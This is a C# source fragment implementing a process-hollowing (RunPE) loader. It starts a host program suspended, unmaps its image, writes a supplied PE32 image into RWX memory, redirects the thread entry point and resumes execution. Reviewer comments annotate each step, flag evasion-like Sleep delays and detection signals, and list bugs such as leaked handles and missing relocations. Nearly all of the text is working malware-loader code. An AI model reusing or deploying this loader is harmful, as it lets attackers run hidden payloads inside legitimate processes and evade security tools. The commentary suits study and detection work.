// P/Invoke to Win32 CreateProcess. The [DllImport] attribute is not visible here —
// presumably on the preceding line. HandleRun below calls this with creationFlags = 4u
// (CREATE_SUSPENDED) so the new process's primary thread never runs before its image
// and context have been replaced. Failure is signalled only by a false return; the
// caller does not capture GetLastError, so the Win32 reason is lost.
private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Loader.STARTUP_INFORMATION startupInfo, ref Loader.PROCESS_INFORMATION processInformation);
// Starts `path` suspended and replaces its mapped image with the raw image in `data`
// before the first instruction executes: CreateProcess(CREATE_SUSPENDED) ->
// NtUnmapViewOfSection -> VirtualAllocEx(RWX) -> WriteProcessMemory ->
// SetThreadContext -> ResumeThread. This is the sequence usually called process
// hollowing / RunPE, and it is exactly the API chain that EDR/sysmon-style telemetry
// keys on. The header offsets read below match the PE32 layout, so `data` is treated
// as a 32-bit PE image; nothing here validates that, and every offset and size is
// taken from `data` unchecked.
//
//   path       - host executable to start; quoted and used as the first command-line token.
//   cmd        - optional extra arguments appended verbatim (unquoted) to the command line.
//   data       - raw bytes of the image to map into the host.
//   compatible - when false, a second VirtualAllocEx at any address is attempted if the
//                preferred image base is unavailable.
//   returns    - true once the host thread has been resumed; false on any failure after
//                attempting to kill the host process.
//
// NOTE(review): the process and thread handles in targetProcessInfo are never closed on
// either path (no CloseHandle / SafeHandle anywhere in this block), so each call leaks two
// kernel handles. Every failure is `throw new Exception()` with no message and no
// Marshal.GetLastWin32Error(), so the actual Win32 error is discarded. The catch block can
// itself throw — see the comment there.
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
{
    // lpNumberOfBytesRead/Written out-parameter for the Read/WriteProcessMemory calls; never inspected.
    int num = 0;
    // Command line starts with the quoted host path (argv[0]).
    string text = string.Format("\"{0}\"", path);
    Loader.STARTUP_INFORMATION targetProcessStartInfo = default(Loader.STARTUP_INFORMATION);
    Loader.PROCESS_INFORMATION targetProcessInfo = default(Loader.PROCESS_INFORMATION);
    // STARTUPINFO.cb must be the structure size.
    targetProcessStartInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(Loader.STARTUP_INFORMATION)));
    bool result;
    try
    {
        if (!string.IsNullOrEmpty(cmd))
        {
            // `cmd` is appended as-is; no quoting/escaping is applied to it.
            text = text + " " + cmd;
        }
        // 4u == CREATE_SUSPENDED: the primary thread exists but has not run.
        if (!Loader.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref targetProcessStartInfo, ref targetProcessInfo))
        {
            throw new Exception();
        }
        // num2 = e_lfanew (DOS header +0x3C): file offset of the NT headers.
        int num2 = BitConverter.ToInt32(data, 60);
        // num3 = OptionalHeader.ImageBase (NT header +0x34 in a PE32 image).
        int num3 = BitConverter.ToInt32(data, num2 + 52);
        // 179 * 4 = 716 bytes, the size of the x86 CONTEXT structure.
        // array[0] is ContextFlags; 65538 == 0x10002 == CONTEXT_INTEGER (x86).
        int[] array = new int[179];
        array[0] = 65538;
        if (IntPtr.Size == 4)
        {
            // 32bit windows
            if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        else
        {
            // windows 64 bit — this loader is a 64-bit process; Wow64GetThreadContext
            // implies the host is assumed to be a 32-bit (WOW64) process. Not verified here.
            if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        // array[41] is byte offset 164 == CONTEXT.Ebx. For the initial thread of a
        // suspended process Ebx holds the PEB address, so num4 = PEB.
        int num4 = array[41];
        int num5 = 0;
        // PEB + 8 == PEB.ImageBaseAddress: num5 = where the host image is currently mapped.
        if (!Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, ref num5, 4, ref num))
        {
            throw new Exception();
        }
        // Only unmap the host image if it occupies the new image's preferred base;
        // otherwise the two are simply allowed to coexist.
        if (num3 == num5)
        {
            if (Loader.NtUnmapViewOfSection(targetProcessInfo.ProcessHandle, num5) != 0)
            {
                throw new Exception();
            }
        }
        // Six Sleep calls in this method total 35 s of idle time. No reason is given;
        // presumably pacing or analysis/sandbox-timeout evasion — confirm before relying on it.
        Loader.Sleep(5000);
        // length = OptionalHeader.SizeOfImage (+0x50), bufferSize = SizeOfHeaders (+0x54).
        int length = BitConverter.ToInt32(data, num2 + 80);
        int bufferSize = BitConverter.ToInt32(data, num2 + 84);
        bool flag = false;
        // 12288 == 0x3000 == MEM_COMMIT | MEM_RESERVE; 64 == 0x40 == PAGE_EXECUTE_READWRITE.
        // Allocating the whole image RWX at the preferred base is another strong detection signal.
        int num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, num3, length, 12288, 64);
        if (!compatible && num6 == 0)
        {
            // Preferred base unavailable: let the kernel pick an address and remember that we did.
            flag = true;
            num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, 0, length, 12288, 64);
        }
        if (num6 == 0)
        {
            throw new Exception();
        }
        Loader.Sleep(5000);
        // Copy the headers (first SizeOfHeaders bytes of the file) to the new base.
        if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6, data, bufferSize, ref num))
        {
            throw new Exception();
        }
        // num7 = first IMAGE_SECTION_HEADER: NT header (24 bytes) + PE32 optional header (224 bytes).
        // num8 = FileHeader.NumberOfSections (NT header +6).
        int num7 = num2 + 248;
        short num8 = BitConverter.ToInt16(data, num2 + 6);
        for (int i = 0; i <= (int)(num8 - 1); i++)
        {
            // Section header fields: +12 VirtualAddress, +16 SizeOfRawData, +20 PointerToRawData.
            int num9 = BitConverter.ToInt32(data, num7 + 12);
            int num10 = BitConverter.ToInt32(data, num7 + 16);
            int srcOffset = BitConverter.ToInt32(data, num7 + 20);
            if (num10 != 0)
            {
                // NOTE(review): num10/srcOffset/num9 come straight from `data`. An out-of-range
                // read of `data` surfaces as a managed exception (caught below), but the
                // remote write range num6 + num9 .. + num10 is never checked against `length`.
                byte[] array2 = new byte[num10];
                Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
                if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
                {
                    throw new Exception();
                }
            }
            // sizeof(IMAGE_SECTION_HEADER) == 40.
            num7 += 40;
        }
        Loader.Sleep(10000);
        // Point PEB.ImageBaseAddress at the new image so the loader sees the replaced base.
        byte[] bytes = BitConverter.GetBytes(num6);
        if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, bytes, 4, ref num))
        {
            throw new Exception();
        }
        // num11 = OptionalHeader.AddressOfEntryPoint (NT header +0x28), an RVA.
        int num11 = BitConverter.ToInt32(data, num2 + 40);
        if (flag)
        {
            // NOTE(review): when the fallback allocation was used, the entry address is built
            // from the *preferred* base num3 rather than the address actually written above
            // (and no base relocations are applied anywhere in this method). That looks
            // inconsistent with the PEB write just above — confirm this is intended.
            num6 = num3;
        }
        // array[44] is byte offset 176 == CONTEXT.Eax, which holds the entry point for the
        // initial thread; redirect it to the new image's entry point.
        array[44] = num6 + num11;
        if (IntPtr.Size == 4)
        {
            if (!Loader.SetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        else
        {
            if (!Loader.Wow64SetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        Loader.Sleep(5000);
        // Reads 4 bytes at address 0 of the target; return value and contents are ignored.
        // Purpose is not evident from this code (the read is expected to fail) — TODO confirm.
        Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, 0x0, ref num5, 4, ref num);
        // Re-fetch the context; the result is not used except to fail the operation.
        if (IntPtr.Size == 4)
        {
            // 32bit windows
            if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        else
        {
            // windows 64 bit
            if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array))
            {
                throw new Exception();
            }
        }
        Loader.Sleep(5000);
        // Patch the PEB — external helper, defined elsewhere; given the thread handle (not the
        // process handle) and this assembly's on-disk path. Its effect cannot be seen from here.
        PEB_Patch.Apply(targetProcessInfo.ThreadHandle, Assembly.GetEntryAssembly().Location);
        Loader.Sleep(5000);
        // ResumeThread returns (DWORD)-1 on failure; from here the host runs the injected image.
        if (Loader.ResumeThread(targetProcessInfo.ThreadHandle) == -1)
        {
            throw new Exception();
        }
    }
    catch (Exception ex)
    {
        // Full exception text goes to stdout.
        Console.WriteLine(ex.ToString());
        // NOTE(review): if CreateProcess itself failed, targetProcessInfo is still default and
        // ProcessId is 0 — GetProcessById/Kill then throw (ArgumentException or Win32Exception)
        // from inside this catch, so HandleRun raises instead of returning false. The null check
        // is dead: GetProcessById throws rather than returning null. Kill() can also throw if the
        // process has already exited.
        Process processById = Process.GetProcessById(Convert.ToInt32(targetProcessInfo.ProcessId));
        if (processById != null)
        {
            processById.Kill();
        }
        result = false;
        return(result);
    }
    result = true;
    return(result);
}